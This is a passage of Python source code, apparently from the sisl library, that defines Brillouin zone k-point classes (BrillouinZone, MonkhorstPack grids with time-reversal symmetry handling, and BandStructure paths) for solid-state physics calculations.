BrillouinZone objects the returned object\n will be.\n \"\"\"\n if isinstance(weight_scale, Real):\n weight_scale = [weight_scale]\n\n # check for lengths (scales cannot be longer!)\n if len(bzs) < len(weight_scale):\n raise ValueError(\n \"BrillouinZone.merge requires length of weight_scale to be smaller or equal to \"\n \"the objects.\"\n )\n\n if parent is None:\n parent = bzs[0].parent\n\n k = []\n w = []\n for bz, scale in itertools.zip_longest(\n bzs, weight_scale, fillvalue=weight_scale[-1]\n ):\n k.append(bz.k)\n w.append(bz.weight * scale)\n\n return BrillouinZone(parent, np.concatenate(k), np.concatenate(w))\n\n def volume(self, ret_dim=False, periodic=None):\n \"\"\"Calculate the volume of the full Brillouin zone of the parent\n\n This will return the volume depending on the dimensions of the system.\n Here the dimensions of the system is determined by how many dimensions\n have auxilliary supercells that can contribute to Brillouin zone integrals.\n Therefore the returned value will have differing units depending on\n dimensionality.\n\n Parameters\n ----------\n ret_dim: bool, optional\n also return the dimensionality of the system\n periodic : array_like of int, optional\n estimate the volume using only the directions indexed by this array.\n The default value is `(self.parent.nsc > 1).nonzero()[0]`.\n\n Returns\n -------\n vol :\n the volume of the Brillouin zone. Units are Ang^D with D being the dimensionality.\n For 0D it will return 0.\n dimensionality : int\n the dimensionality of the volume\n \"\"\"\n # default periodic array\n if periodic is None:\n periodic = (self.parent.nsc > 1).nonzero()[0]\n\n dim = len(periodic)\n vol = 0.0\n if dim == 3:\n vol = self.parent.volume\n elif dim == 2:\n vol = self.parent.area(*periodic)\n elif dim == 1:\n vol = self.parent.length[periodic[0]]\n\n if ret_dim:\n return vol, dim\n return vol\n\n @staticmethod\n def parametrize(parent, func, N, *args, **kwargs):\n \"\"\"Generate a new `BrillouinZone` object with k-points parameterized via the function `func` in `N` separations\n\n Generator of a parameterized Brillouin zone object that contains a parameterized k-point\n list.\n\n Parameters\n ----------\n parent : Lattice, or LatticeChild\n the object that the returned object will contain as parent\n func : callable\n method that parameterizes the k-points, *must* at least accept three arguments,\n 1. ``parent``: object\n 2. ``N``: total number of k-points\n 3. ``i``: current index of the k-point (starting from 0)\n\n the function must return a k-point in 3 dimensions.\n N : int or list of int\n number of k-points generated using the parameterization,\n or a list of integers that will be looped over.\n In this case arguments ``N`` and ``i`` in `func` will be\n lists accordingly.\n *args :\n additional arguments passed directly to `func`\n **kwargs :\n additional keyword arguments passed directly to `func`\n\n\n Examples\n --------\n Simple linear k-points\n\n >>> def func(sc, N, i):\n ... return [i/N, 0, 0]\n >>> bz = BrillouinZone.parametrize(1, func, 10)\n >>> assert len(bz) == 10\n >>> assert np.allclose(bz.k[-1, :], [9./10, 0, 0])\n\n For double looping, say to create your own grid\n\n >>> def func(sc, N, i):\n ... return [i[0]/N[0], i[1]/N[1], 0]\n >>> bz = BrillouinZone.parametrize(1, func, [10, 5])\n >>> assert len(bz) == 50\n\n \"\"\"\n if isinstance(N, Integral):\n k = np.empty([N, 3], np.float64)\n for i in range(N):\n k[i] = func(parent, N, i, *args, **kwargs)\n else:\n # N must be some-kind of list like thingy\n Nk = np.prod(N)\n k = np.empty([Nk, 3], np.float64)\n for i, indices in enumerate(itertools.product(*map(range, N))):\n k[i] = func(parent, N, indices, *args, **kwargs)\n return BrillouinZone(parent, k)\n\n @staticmethod\n def param_circle(parent, N_or_dk, kR, normal, origin, loop=False):\n r\"\"\"Create a parameterized k-point list where the k-points are generated on a circle around an origin\n\n The generated circle is a perfect circle in the reciprocal space (Cartesian coordinates).\n To generate a perfect circle in units of the reciprocal lattice vectors one can\n generate the circle for a diagonal supercell with side-length :math:`2\\pi`, see\n example below.\n\n Parameters\n ----------\n parent : Lattice, or LatticeChild\n the parent object\n N_or_dk : int\n number of k-points generated using the parameterization (if an integer),\n otherwise it specifies the discretization length on the circle (in 1/Ang),\n If the latter case will use less than 4 points a warning will be raised and\n the number of points increased to 4.\n kR : float\n radius of the k-point. In 1/Ang\n normal : array_like of float\n normal vector to determine the circle plane\n origin : array_like of float\n origin of the circle used to generate the circular parameterization\n loop : bool, optional\n whether the first and last point are equal\n\n Examples\n --------\n\n >>> lattice = Lattice([1, 1, 10, 90, 90, 60])\n >>> bz = BrillouinZone.param_circle(lattice, 10, 0.05, [0, 0, 1], [1./3, 2./3, 0])\n\n To generate a circular set of k-points in reduced coordinates (reciprocal\n\n >>> lattice = Lattice([1, 1, 10, 90, 90, 60])\n >>> bz = BrillouinZone.param_circle(lattice, 10, 0.05, [0, 0, 1], [1./3, 2./3, 0])\n >>> bz_rec = BrillouinZone.param_circle(2*np.pi, 10, 0.05, [0, 0, 1], [1./3, 2./3, 0])\n >>> bz.k[:, :] = bz_rec.k[:, :]\n\n Returns\n -------\n BrillouinZone\n with the parameterized k-points.\n \"\"\"\n if isinstance(N_or_dk, Integral):\n N = N_or_dk\n else:\n # Calculate the required number of points\n N = int(kR**2 * pi / N_or_dk + 0.5)\n if N < 2:\n N = 2\n info(\n \"BrillouinZone.param_circle increased the number of circle points to 2.\"\n )\n\n # Conversion object\n bz = BrillouinZone(parent)\n\n normal = _a.asarrayd(normal)\n origin = _a.asarrayd(origin)\n k_n = bz.tocartesian(normal)\n k_o = bz.tocartesian(origin)\n\n # Generate a preset list of k-points on the unit-circle\n if loop:\n radians = _a.aranged(N) / (N - 1) * 2 * np.pi\n else:\n radians = _a.aranged(N) / N * 2 * np.pi\n k = _a.emptyd([N, 3])\n k[:, 0] = np.cos(radians)\n k[:, 1] = np.sin(radians)\n k[:, 2] = 0.0\n\n # Now generate the rotation\n _, theta, phi = cart2spher(k_n)\n if theta != 0:\n pv = _a.arrayd([k_n[0], k_n[1], 0])\n pv /= fnorm(pv)\n q = Quaternion(phi, pv, rad=True) * Quaternion(theta, [0, 0, 1], rad=True)\n else:\n q = Quaternion(0.0, [0, 0, k_n[2] / abs(k_n[2])], rad=True)\n\n # Calculate k-points\n k = q.rotate(k)\n k *= kR / fnorm(k).reshape(-1, 1)\n k = bz.toreduced(k + k_o)\n\n # The sum of weights is equal to the BZ area\n W = np.pi * kR**2\n w = np.repeat([W / N], N)\n\n return BrillouinZone(parent, k, w)\n\n def copy(self, parent=None):\n \"\"\"Create a copy of this object, optionally changing the parent\n\n Parameters\n ----------\n parent : optional\n change the parent\n \"\"\"\n if parent is None:\n parent = self.parent\n bz = self.__class__(parent, self._k, self.weight)\n bz._k = self._k.copy()\n bz._w = self._w.copy()\n return bz\n\n @property\n def k(self):\n \"\"\"A list of all k-points (if available)\"\"\"\n return self._k\n\n @property\n def weight(self):\n \"\"\"Weight of the k-points in the `BrillouinZone` object\"\"\"\n return self._w\n\n @property\n def cell(self):\n return self.parent.cell\n\n @property\n def rcell(self):\n return self.parent.rcell\n\n def tocartesian(self, k):\n \"\"\"Transfer a k-point in reduced coordinates to the Cartesian coordinates\n\n Parameters\n ----------\n k : list of float\n k-point in reduced coordinates\n\n Returns\n -------\n numpy.ndarray\n in units of 1/Ang\n \"\"\"\n return dot(k, self.rcell)\n\n def toreduced(self, k):\n \"\"\"Transfer a k-point in Cartesian coordinates to the reduced coordinates\n\n Parameters\n ----------\n k : list of float\n k-point in Cartesian coordinates\n\n Returns\n -------\n numpy.ndarray\n in units of reciprocal lattice vectors ]-0.5 ; 0.5] (if k is in the primitive cell)\n \"\"\"\n return dot(k, self.cell.T / (2 * pi))\n\n @staticmethod\n def in_primitive(k):\n \"\"\"Move the k-point into the primitive point(s) ]-0.5 ; 0.5]\n\n Parameters\n ----------\n k : array_like\n k-point(s) to move into the primitive cell\n\n Returns\n -------\n numpy.ndarray\n all k-points moved into the primitive cell\n \"\"\"\n k = _a.arrayd(k) % 1.0\n\n # Ensure that we are in the interval ]-0.5; 0.5]\n k[k > 0.5] -= 1\n\n return k\n\n def iter(self, ret_weight=False):\n \"\"\"An iterator for the k-points and (possibly) the weights\n\n Parameters\n ----------\n ret_weight : bool, optional\n if true, also yield the weight for the respective k-point\n\n Yields\n ------\n kpt : k-point\n weight : weight of k-point, only if `ret_weight` is true.\n \"\"\"\n if ret_weight:\n for i in range(len(self)):\n yield self.k[i], self.weight[i]\n else:\n yield from self.k\n\n __iter__ = iter\n\n def __len__(self):\n return len(self._k)\n\n def write(self, sile, *args, **kwargs):\n \"\"\"Writes k-points to a `~sisl.io.tableSile`.\n\n This allows one to pass a `tableSile` or a file-name.\n \"\"\"\n from sisl.io import tableSile\n\n kw = np.concatenate((self.k, self.weight.reshape(-1, 1)), axis=1)\n if isinstance(sile, tableSile):\n sile.write_data(kw.T, *args, **kwargs)\n else:\n with tableSile(sile, \"w\") as fh:\n fh.write_data(kw.T, *args, **kwargs)\n\n\n@set_module(\"sisl.physics\")\nclass MonkhorstPack(BrillouinZone):\n r\"\"\"Create a Monkhorst-Pack grid for the Brillouin zone\n\n Parameters\n ----------\n parent : object or array_like\n An object with associated `parent.cell` and `parent.rcell` or\n an array of floats which may be turned into a `Lattice`\n nkpt : array_like of ints\n a list of number of k-points along each cell direction\n displacement : float or array_like of float, optional\n the displacement of the evenly spaced grid, a single floating\n number is the displacement for the 3 directions, else they\n are the individual displacements\n size : float or array_like of float, optional\n the size of the Brillouin zone sampled. This reduces the boundaries\n of the Brillouin zone around the displacement to the fraction specified.\n I.e. `size` must be of values :math:`]0 ; 1]`. Defaults to the entire BZ.\n Note that this will also reduce the weights such that the weights\n are normalized to the entire BZ.\n centered : bool, optional\n whether the k-points are :math:`\\Gamma`-centered (for zero displacement)\n trs : bool, optional\n whether time-reversal symmetry exists in the Brillouin zone.\n\n Examples\n --------\n >>> lattice = Lattice(3.)\n >>> MonkhorstPack(lattice, 10) # 10 x 10 x 10 (with TRS)\n >>> MonkhorstPack(lattice, [10, 5, 5]) # 10 x 5 x 5 (with TRS)\n >>> MonkhorstPack(lattice, [10, 5, 5], trs=False) # 10 x 5 x 5 (without TRS)\n \"\"\"\n\n def __init__(\n self, parent, nkpt, displacement=None, size=None, centered=True, trs=True\n ):\n super().__init__(parent)\n\n if isinstance(nkpt, Integral):\n nkpt = np.diag([nkpt] * 3)\n elif isinstance(nkpt[0], Integral):\n nkpt = np.diag(nkpt)\n\n # Now we have a matrix of k-points\n if np.any(nkpt - np.diag(np.diag(nkpt)) != 0):\n raise NotImplementedError(\n f\"{self.__class__.__name__} with off-diagonal components is not implemented yet\"\n )\n\n if displacement is None:\n displacement = np.zeros(3, np.float64)\n elif isinstance(displacement, Real):\n displacement = _a.fulld(3, displacement)\n else:\n # transfer the displacement to the primitive cell\n displacement = _a.asarrayd(displacement)\n displacement = self.in_primitive(displacement)\n\n if size is None:\n size = _a.onesd(3)\n elif isinstance(size, Real):\n size = _a.fulld(3, size)\n else:\n size = _a.asarrayd(size)\n\n # Retrieve the diagonal number of values\n Dn = np.diag(nkpt).astype(np.int32)\n if np.any(Dn) == 0:\n raise ValueError(\n f\"{self.__class__.__name__} *must* be initialized with \"\n \"diagonal elements different from 0.\"\n )\n\n i_trs = -1\n if trs:\n # Figure out which direction to TRS\n nmax = 0\n for i in [0, 1, 2]:\n if displacement[i] in [0.0, 0.5] and Dn[i] > nmax:\n nmax = Dn[i]\n i_trs = i\n if nmax == 1:\n i_trs = -1\n if i_trs == -1:\n # If we still haven't decided (say for weird displacements)\n # simply take the one with the maximum number of k-points.\n i_trs = np.argmax(Dn)\n\n # Calculate k-points and weights along all directions\n kw = [\n self.grid(Dn[i], displacement[i], size[i], centered, i == i_trs)\n for i in (0, 1, 2)\n ]\n\n # Now figure out if we have a 0 point along the TRS direction\n if trs:\n # Figure out if the first value is zero\n if abs(kw[i_trs][0][0]) < 1e-10:\n # Find indices we want to delete\n ik1, ik2 = (i_trs + 1) % 3, (i_trs + 2) % 3\n k1, k2 = kw[ik1][0], kw[ik2][0]\n k_dup = _a.emptyd([k1.size, k2.size, 2])\n k_dup[:, :, 0] = k1.reshape(-1, 1)\n k_dup[:, :, 1] = k2.reshape(1, -1)\n # Figure out the duplicate values\n # To do this we calculate the norm matrix\n # Note for a 100 x 100 k-point sampling this will produce\n # a 100 ^ 4 matrix ~ 93 MB\n # For larger k-point samplings this is probably not so good (300x300 -> 7.5 GB)\n k_dup = k_dup.reshape(k1.size, k2.size, 1, 1, 2) + k_dup.reshape(\n 1, 1, k1.size, k2.size, 2\n )\n k_dup = (\n (k_dup[..., 0] ** 2 + k_dup[..., 1] ** 2) ** 0.5 < 1e-10\n ).nonzero()\n # At this point we have found all duplicate points, to only take one\n # half of the points we only take the lower half\n # Also, the Gamma point is *always* zero, so we shouldn't do <=!\n # Now check the case where one of the directions is (only) the Gamma-point\n if kw[ik1][0].size == 1 and kw[ik1][0][0] == 0.0:\n # We keep all indices for the ik1 direction (since it is the Gamma-point!\n rel = (k_dup[1] > k_dup[3]).nonzero()[0]\n elif kw[ik2][0].size == 1 and kw[ik2][0][0] == 0.0:\n # We keep all indices for the ik2 direction (since it is the Gamma-point!\n rel = (k_dup[0] > k_dup[2]).nonzero()[0]\n else:\n rel = np.logical_and(k_dup[0] > k_dup[2], k_dup[1] > k_dup[3])\n k_dup = (k_dup[0][rel], k_dup[1][rel], k_dup[2][rel], k_dup[3][rel])\n del rel, k1, k2\n else:\n # To signal we can't do this\n k_dup = None\n\n self._k = _a.emptyd((kw[0][0].size, kw[1][0].size, kw[2][0].size, 3))\n self._w = _a.onesd(self._k.shape[:-1])\n for i in (0, 1, 2):\n k = kw[i][0].reshape(-1, 1, 1)\n w = kw[i][1].reshape(-1, 1, 1)\n self._k[..., i] = np.rollaxis(k, 0, i + 1)\n self._w[...] *= np.rollaxis(w, 0, i + 1)\n\n del kw\n # Now clean up a few of the points\n if trs and k_dup is not None:\n # Create the correct indices in the ravelled indices\n k = [0] * 3\n k[ik1] = k_dup[2]\n k[ik2] = k_dup[3]\n k_del = np.ravel_multi_index(tuple(k), self._k.shape[:-1])\n k[ik1] = k_dup[0]\n k[ik2] = k_dup[1]\n k_dup = np.ravel_multi_index(tuple(k), self._k.shape[:-1])\n del k\n\n self._k.shape = (-1, 3)\n self._w.shape = (-1,)\n\n if trs and k_dup is not None:\n self._k = np.delete(self._k, k_del, 0)\n self._w[k_dup] += self._w[k_del]\n self._w = np.delete(self._w, k_del)\n del k_dup, k_del\n\n # Store information regarding size and diagonal elements\n # This information is basically only necessary when\n # we want to replace special k-points\n self._diag = Dn # vector\n self._displ = displacement # vector\n self._size = size # vector\n self._centered = centered\n self._trs = i_trs\n\n @property\n def displacement(self):\n \"\"\"Displacement for this Monkhorst-Pack grid\"\"\"\n return self._displ\n\n def __str__(self):\n \"\"\"String representation of `MonkhorstPack`\"\"\"\n if isinstance(self.parent, Lattice):\n p = self.parent\n else:\n p = self.parent.lattice\n return (\n \"{cls}{{nk: {nk:d}, size: [{size[0]:.5f} {size[1]:.5f} {size[0]:.5f}], trs: {trs},\"\n \"\\n diagonal: [{diag[0]:d} {diag[1]:d} {diag[2]:d}], displacement: [{disp[0]:.5f} {disp[1]:.5f} {disp[2]:.5f}],\"\n \"\\n {lattice}\\n}}\"\n ).format(\n cls=self.__class__.__name__,\n nk=len(self),\n size=self._size,\n trs={0: \"A\", 1: \"B\", 2: \"C\"}.get(self._trs, \"no\"),\n diag=self._diag,\n disp=self._displ,\n lattice=str(p).replace(\"\\n\", \"\\n \"),\n )\n\n def __getstate__(self):\n \"\"\"Return dictionary with the current state\"\"\"\n state = super().__getstate__()\n state[\"diag\"] = self._diag\n state[\"displ\"] = self._displ\n state[\"size\"] = self._size\n state[\"centered\"] = self._centered\n state[\"trs\"] = self._trs\n return state\n\n def __setstate__(self, state):\n \"\"\"Reset state of the object\"\"\"\n super().__setstate__(state)\n self._diag = state[\"diag\"]\n self._displ = state[\"displ\"]\n self._size = state[\"size\"]\n self._centered = state[\"centered\"]\n self._trs = state[\"trs\"]\n\n def copy(self, parent=None):\n \"\"\"Create a copy of this object, optionally changing the parent\n\n Parameters\n ----------\n parent : optional\n change the parent\n \"\"\"\n if parent is None:\n parent = self.parent\n bz = self.__class__(\n parent, self._diag, self._displ, self._size, self._centered, self._trs >= 0\n )\n # this is required due to replace calls\n bz._k = self._k.copy()\n bz._w = self._w.copy()\n return bz\n\n @classmethod\n def grid(cls, n, displ=0.0, size=1.0, centered=True, trs=False):\n r\"\"\"Create a grid of `n` points with an offset of `displ` and sampling `size` around `displ`\n\n The :math:`k`-points are :math:`\\Gamma` centered.\n\n Parameters\n ----------\n n : int\n number of points in the grid. If `trs` is ``True`` this may be smaller than `n`\n displ : float, optional\n the displacement of the grid\n size : float, optional\n the total size of the Brillouin zone to sample\n centered : bool, optional\n if the points are centered\n trs : bool, optional\n whether time-reversal-symmetry is applied\n\n Returns\n -------\n k : numpy.ndarray\n the list of k-points in the Brillouin zone to be sampled\n w : numpy.ndarray\n weights for the k-points\n \"\"\"\n # First ensure that displ is in the Brillouin\n displ = displ % 1.0\n if displ > 0.5:\n displ -= 1.0\n if displ < -0.5:\n displ += 1.0\n\n # Centered _only_ has effect IFF\n # displ == 0. and size == 1\n # Otherwise we resort to other schemes\n if displ != 0.0 or size != 1.0:\n centered = False\n\n # size *per k-point*\n dsize = size / n\n\n # We create the full grid, then afterwards we figure out TRS\n n_half = n // 2\n if n % 2 == 1:\n k = _a.aranged(-n_half, n_half + 1) * dsize + displ\n else:\n k = _a.aranged(-n_half, n_half) * dsize + displ\n if not centered:\n # Shift everything by halve the size each occupies\n k += dsize / 2\n\n # Move k to the primitive cell and generate weights\n k = cls.in_primitive(k)\n w = _a.fulld(n, dsize)\n\n # Check for TRS points\n if trs and np.any(k < 0.0):\n # Make all positive to remove the double conting terms\n k_pos = np.fabs(k)\n\n # Sort k-points and weights\n idx = argsort(k_pos)\n\n # Re-arange according to k value\n k_pos = k_pos[idx]\n w = w[idx]\n\n # Find indices of all equivalent k-points (tolerance of 1e-10 in reciprocal units)\n # Use the dsize to estimate the difference in positions\n idx_same = (np.diff(k_pos) < dsize * 1e-3).nonzero()[0]\n\n # The above algorithm should never create more than two duplicates.\n # Hence we can simply remove all idx_same and double the weight for all\n # idx_same + 1.\n w[idx_same + 1] *= 2\n # Delete the duplicated k-points (they are already sorted)\n k = np.delete(k_pos, idx_same, axis=0)\n w = np.delete(w, idx_same)\n else:\n # Sort them, because it makes more visual sense\n idx = argsort(k)\n k = k[idx]\n w = w[idx]\n\n # Return values\n return k, w\n\n def replace(self, k, mp, displacement=False, as_index=False, check_vol=True):\n r\"\"\"Replace a k-point with a new set of k-points from a Monkhorst-Pack grid\n\n This method tries to replace an area corresponding to `mp.size` around the k-point `k`\n such that the k-points are replaced.\n This enables one to zoom in on specific points in the Brillouin zone for detailed analysis.\n\n Parameters\n ----------\n k : array_like\n k-point in this object to replace, if `as_index` is true, it will be regarded as integer\n positions of the k-points to replace, otherwise the indices of the k-points will be located\n individually (in chunks of 200 MB).\n mp : MonkhorstPack\n object containing the replacement k-points.\n displacement : array_like or bool, optional\n the displacment of the `mp` k-points. Needed for doing *lots* of replacements due to efficiency.\n Defaults to not displace anything. The inserted k-points will be `mp.k + displacement`.\n If True, it will use `k` as the displacement vector. For multiple k-point replacements\n each k-point will be replaced my `mp` with k as the displacement.\n as_index : bool, optional\n whether `k` is input as reciprocal k-points, or as indices of k-points in this object.\n check_vol : bool, optional\n whether to check the volume of the replaced k-point(s); by default the volume of each k-point\n is determined by the original ``size`` and ``nkpt`` values. However, when doing\n replacements of k-points these values are not kept for the individual k-points\n that were replaced, so subsequent replacements of these points will cause errors that\n effectively are not valid.\n\n Examples\n --------\n\n This example creates a zoomed-in view of the :math:`\\Gamma`-point by replacing it with\n a 3x3x3 Monkhorst-Pack grid.\n\n >>> lattice = Lattice(1.)\n >>> mp = MonkhorstPack(lattice, [3, 3, 3])\n >>> mp.replace([0, 0, 0], MonkhorstPack(lattice, [3, 3, 3], size=1./3))\n\n This example creates a zoomed-in view of the :math:`\\Gamma`-point by replacing it with\n a 4x4x4 Monkhorst-Pack grid.\n\n >>> lattice = Lattice(1.)\n >>> mp = MonkhorstPack(lattice, [3, 3, 3])\n >>> mp.replace([0, 0, 0], MonkhorstPack(lattice, [4, 4, 4], size=1./3))\n\n This example creates a zoomed-in view of the :math:`\\Gamma`-point by replacing it with\n a 4x4x1 Monkhorst-Pack grid.\n\n >>> lattice = Lattice(1.)\n >>> mp = MonkhorstPack(lattice, [3, 3, 3])\n >>> mp.replace([0, 0, 0], MonkhorstPack(lattice, [4, 4, 1], size=1./3))\n\n Raises\n ------\n SislError\n if the size of the replacement `MonkhorstPack` grid is not compatible with the k-point spacing in this object.\n \"\"\"\n # First we find all k-points within k +- mp.size\n # Those are the points we wish to remove.\n # Secondly we need to ensure that the k-points we remove are occupying *exactly*\n # the Brillouin zone we wish to replace.\n if not isinstance(mp, MonkhorstPack):\n raise ValueError(\"Object 'mp' is not a MonkhorstPack object\")\n\n if check_vol:\n # We can easily figure out the BZ that each k-point is averaging\n k_vol = self._size / self._diag\n\n # Compare against the size of this one\n # Since we can remove more than one k-point, we require that the\n # size of the replacement MP is an integer multiple of the\n # k-point volumes.\n k_int = mp._size / k_vol\n if not np.allclose(np.rint(k_int), k_int):\n raise SislError(\n f\"{self.__class__.__name__}.reduce could not replace k-point, BZ \"\n \"volume replaced is not equivalent to the inherent k-point volume.\"\n )\n\n # the size of the k-points that will be added\n s_size2 = self._size / 2\n mp_size2 = mp._size / 2\n dk = np.where(mp_size2 < s_size2, mp_size2, s_size2)\n dk.shape = (1, 3)\n\n # determine indices of k-point inputs\n k = np.asarray(k)\n\n if as_index:\n idx = k.ravel()\n k = self.k[idx]\n else:\n # find k-points in batches of 200 MB\n k = self.in_primitive(k).reshape(-1, 3)\n idx = batched_indices(\n self.k, k, atol=dk, batch_size=200, diff_func=self.in_primitive\n )[0]\n if (\n self._trs >= 0\n ): # TRS along a given axis, we can search the mirrored values\n idx2 = batched_indices(\n self.k, -k, atol=dk, batch_size=200, diff_func=self.in_primitive\n )[0]\n idx = np.concatenate((idx, idx2))\n # we may find 2 indices for gamm-point in this case... not useful\n idx = np.unique(idx)\n\n if len(idx) == 0:\n raise SislError(\n f\"{self.__class__.__name__}.reduce found no k-points to replace. \"\n f\"Searched with precision: {dk.ravel()}\"\n )\n\n # Idea of fast replacements is attributed @ahkole in #454, but the resulting code needed some\n # changes since that code was not stable againts *wrong input*, i.e. k=[0, 0, 0]\n # replacements.\n\n # determine the displacement vector\n if isinstance(displacement, bool):\n if displacement:\n displacement = k\n else:\n displacement = None\n\n elif displacement is not None:\n # convert to array\n displacement = _a.asarray(displacement).reshape(-1, 3)\n\n if displacement is None:\n displ_nk = 1\n else:\n # Ensure we are in the central k-grid\n displacement = self.in_primitive(displacement)\n displ_nk = len(displacement)\n\n # Now we have the k-points we need to remove\n # Figure out if the total weight is consistent\n total_weight = self.weight[idx].sum()\n replace_weight = mp.weight.sum() * displ_nk\n atol = min(total_weight, replace_weight) * 1e-4\n if abs(total_weight - replace_weight) < atol:\n weight_factor = 1.0\n elif abs(total_weight - replace_weight * 2) < atol:\n weight_factor = 2.0\n if self._trs < 0:\n info(\n f\"{self.__class__.__name__}.reduce assumes that the replaced k-point has double weights.\"\n )\n else:\n # print(\"k-point to replace: \", k.ravel())\n # print(\"delta-k: \", dk.ravel())\n # print(\"Found k-indices that will be replaced:\")\n # print(idx)\n # print(\"k-points replaced:\")\n # print(self.k[idx, :])\n # print(\"weights replaced:\")\n # print(self.weight[idx])\n # print(self.weight.min(), self.weight.max())\n # print(mp.weight.min(), mp.weight.max())\n # print(\"Summed weights vs. replaced summed weights: \")\n # print(total_weight, replace_weight)\n # print(mp)\n raise SislError(\n f\"{self.__class__.__name__}.reduce found inconsistent replacement weights \"\n f\"self={total_weight} vs. mp={replace_weight}. \"\n f\"Replacement indices: {idx}.\"\n )\n\n # delete and append new k-points and weights\n if displacement is None:\n self._k = np.concatenate((np.delete(self._k, idx, axis=0), mp._k), axis=0)\n else:\n self._k = np.concatenate(\n (\n np.delete(self._k, idx, axis=0),\n self.in_primitive(mp.k + displacement.reshape(-1, 1, 3)).reshape(\n -1, 3\n ),\n ),\n axis=0,\n )\n self._w = np.concatenate(\n (np.delete(self._w, idx), np.tile(mp._w * weight_factor, displ_nk))\n )\n\n\n@set_module(\"sisl.physics\")\nclass BandStructure(BrillouinZone):\n \"\"\"Create a path in the Brillouin zone for plotting band-structures etc.\n\n Parameters\n ----------\n parent : object or array_like\n An object with associated `parent.cell` and `parent.rcell` or\n an array of floats which may be turned into a `Lattice`\n points : array_like of float\n a list of points that are the *corners* of the path\n divisions : int or array_like of int\n number of divisions in each segment.\n If a single integer is passed it is the total number\n of points on the path (equally separated).\n If it is an array_like input it must have length one\n less than `point`, in this case the total number of points\n will be ``sum(divisions) + 1`` due to the end-point constraint.\n names : array_like of str\n the associated names of the points on the Brillouin Zone path\n jump_dk: float or array_like, optional\n Percentage of ``self.lineark()[-1]`` that is used as separation between discontinued\n jumps in the band-structure.\n For band-structures with disconnected jumps the `lineark` and `lineartick` methods\n returns a separation between the disconnected points according to this percentage.\n Default value is 5% of the total distance. Alternatively an array equal to the\n number of discontinuity jumps may be passed for individual percentages.\n Keyword only, argument.\n\n Examples\n --------\n >>> lattice = Lattice(10)\n >>> bs = BandStructure(lattice, [[0] * 3, [0.5] * 3], 200)\n >>> bs = BandStructure(lattice, [[0] * 3, [0.5] * 3, [1.] * 3], 200)\n >>> bs = BandStructure(lattice, [[0] * 3, [0.5] * 3, [1.] * 3], 200, ['Gamma', 'M', 'Gamma'])\n\n A disconnected band structure may be created by either having a point of 0 length, or None.\n Note that the number of names does not contain the empty points (they are simply removed).\n Such a band-structure may be useful when one is not interested in a fully connected band structure.\n\n >>> bs = BandStructure(lattice, [[0, 0, 0], [0, 0.5, 0], None, [0.5, 0, 0], [0.5, 0.5, 0]], 200)\n \"\"\"\n\n @deprecate_argument(\n \"name\",\n \"names\",\n \"argument 'name' has been deprecated in favor of 'names', please update your code.\",\n \"0.15.0\",\n )\n def __init__(self, parent, *args, **kwargs):\n # points, divisions, names=None):\n super().__init__(parent)\n\n points = kwargs.pop(\"points\", None)\n if points is None:\n if len(args) > 0:\n points, *args = args\n else:\n raise ValueError(f\"{self.__class__.__name__} 'points' argument missing\")\n\n divisions = kwargs.pop(\"divisions\", None)\n if divisions is None:\n if len(args) > 0:\n divisions, *args = args\n else:\n raise ValueError(\n f\"{self.__class__.__name__} 'divisions' argument missing\"\n )\n\n names = kwargs.pop(\"names\", None)\n if names is None:\n if len(args) > 0:\n names, *args = args\n\n if len(args) > 0:\n raise ValueError(\n f\"{self.__class__.__name__} unknown arguments after parsing 'points', 'divisions' and 'names': {args}\"\n )\n\n # Store empty split size\n self._jump_dk = np.asarray(kwargs.pop(\"jump_dk\", 0.05))\n\n if len(kwargs) > 0:\n raise ValueError(\n f\"{self.__class__.__name__} unknown keyword arguments after parsing [points, divisions, names, jump_dk]: {list(kwargs.keys())}\"\n )\n\n # Copy over points\n # Check if any of the points is None or has length 0\n # In that case it is a disconnected path\n def is_empty(ix):\n try:\n return len(ix[1]) == 0\n except Exception:\n return ix[1] is None\n\n # filter out jump directions\n jump_idx = _a.arrayi([i for i, _ in filter(is_empty, enumerate(points))])\n\n # store only *valid* points\n self.points = _a.arrayd([p for i, p in enumerate(points) if i not in jump_idx])\n\n # remove erroneous jumps\n if len(points) - 1 in jump_idx:\n jump_idx = jump_idx[:-1]\n if 0 in jump_idx:\n jump_idx = jump_idx[1:]\n\n if self._jump_dk.size > 1 and jump_idx.size != self._jump_dk.size:\n raise ValueError(\n f\"{self.__class__.__name__} got inconsistent argument lengths (jump_dk does not match jumps in points)\"\n )\n\n # The jump-idx is equal to using np.split(self.points, jump_idx)\n # which then returns continuous sections\n # correct for removed indices\n jump_idx -= np.arange(len(jump_idx))\n self._jump_idx = jump_idx\n\n # If the array has fewer points we try and determine\n if self.points.shape[1] < 3:\n if self.points.shape[1] != np.sum(self.parent.nsc > 1):\n raise ValueError(\"Could not determine the non-periodic direction\")\n\n # fix the points where there are no periodicity\n for i in (0, 1, 2):\n if self.parent.nsc[i] == 1:\n self.points = np.insert(self.points, i, 0.0, axis=1)\n\n # Ensure the shape is correct\n self.points.shape = (-1, 3)\n\n # Now figure out what to do with the divisions\n if isinstance(divisions, Integral):\n if divisions < len(self.points):\n raise ValueError(\n f\"Can not evenly split {len(self.points)} points into {divisions} divisions, ensure division>=len(points)\"\n )\n\n # Get length between different k-points with a total length\n # of division\n dists = np.diff(\n linspace_bz(self.tocartesian(self.points), jumps=jump_idx, jump_dk=0.0)\n )\n\n # Get floating point divisions\n divs_r = dists * divisions / dists.sum()\n # Convert to integers\n divs = np.rint(divs_r).astype(np.int32)\n # ensure at least 1 point along each division\n # 1 division means only the starting point\n divs[divs == 0] = 1\n divs[jump_idx - 1] = 1\n divs_sum = divs.sum()\n while divs_sum != divisions - 1:\n # only check indices where divs > 1\n idx = (divs > 1).nonzero()[0]\n dk = dists[idx] / divs[idx]\n if divs_sum >= divisions:\n divs[idx[np.argmin(dk)]] -= 1\n else:\n divs[idx[np.argmax(dk)]] += 1\n divs_sum = divs.sum()\n\n divisions = divs[:]\n\n elif len(divisions) + 1 != len(self.points):\n raise ValueError(\n f\"inconsistent number of elements in 'points' and 'divisions' argument. One less 'divisions' elements.\"\n )\n\n self.divisions = _a.arrayi(divisions).ravel()\n\n if names is None:\n self.names = \"ABCDEFGHIJKLMNOPQRSTUVXYZ\"[: len(self.points)]\n else:\n self.names = names\n if len(self.names) != len(self.points):\n raise ValueError(\n f\"inconsistent number of elements in 'points' and 'names' argument\"\n )\n\n # Calculate points\n dpoint = np.diff(self.points, axis=0)\n k = _a.emptyd([self.divisions.sum() + 1, 3])\n i = 0\n for ik, (divs, dk) in enumerate(zip(self.divisions, dpoint)):\n k[i : i + divs, :] = (\n self.points[ik] + 